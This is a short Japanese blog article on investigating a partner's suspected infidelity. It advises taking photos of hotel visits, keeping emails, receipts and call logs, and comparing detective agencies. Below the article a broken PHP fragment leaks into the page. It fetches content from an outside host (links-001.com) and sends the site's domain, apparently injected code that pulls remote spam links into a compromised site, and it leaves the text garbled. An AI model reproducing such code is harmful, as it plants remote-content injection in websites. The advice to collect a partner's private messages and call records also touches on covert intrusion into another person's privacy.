パートナーに対する浮気調査方法

浮気調査で最も必要となってくるのは写真となってきます。
これは後々、争った時などの証拠となります。
写真の内容としてはホテルなどへの出入りや、明らかに性行為などの行為があったとみなされる物が良いでしょう。
また複数回の浮気の可能性も否めないので、日時などを変更し証拠写真を撮る必要もあります。
そして最近ではメールなどのやり取りや写メなどの証拠なども、証拠として残せる物ならば残しておきましょう。
次には相手ですが、慰謝料などを請求する際に必要となってきます。
また不信感を抱いた日時の、レシートや通話履歴なども証拠となる場合もあります。
ただしこの場合には、誤魔化される可能性も高くなってくるので注意が必要となります。
浮気調査に際しては自身で証拠をつかむ方法と探偵に依頼する方法がありますが、調査の依頼をする場合には、複数の探偵事務所に見積もりを依頼することをお勧めします。
愛するパートナーの浮気を疑った時点で、悲しい思いをすることとなりますが、万が一、自身で調査をしていて現場を目撃したとしても冷静になりましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新記事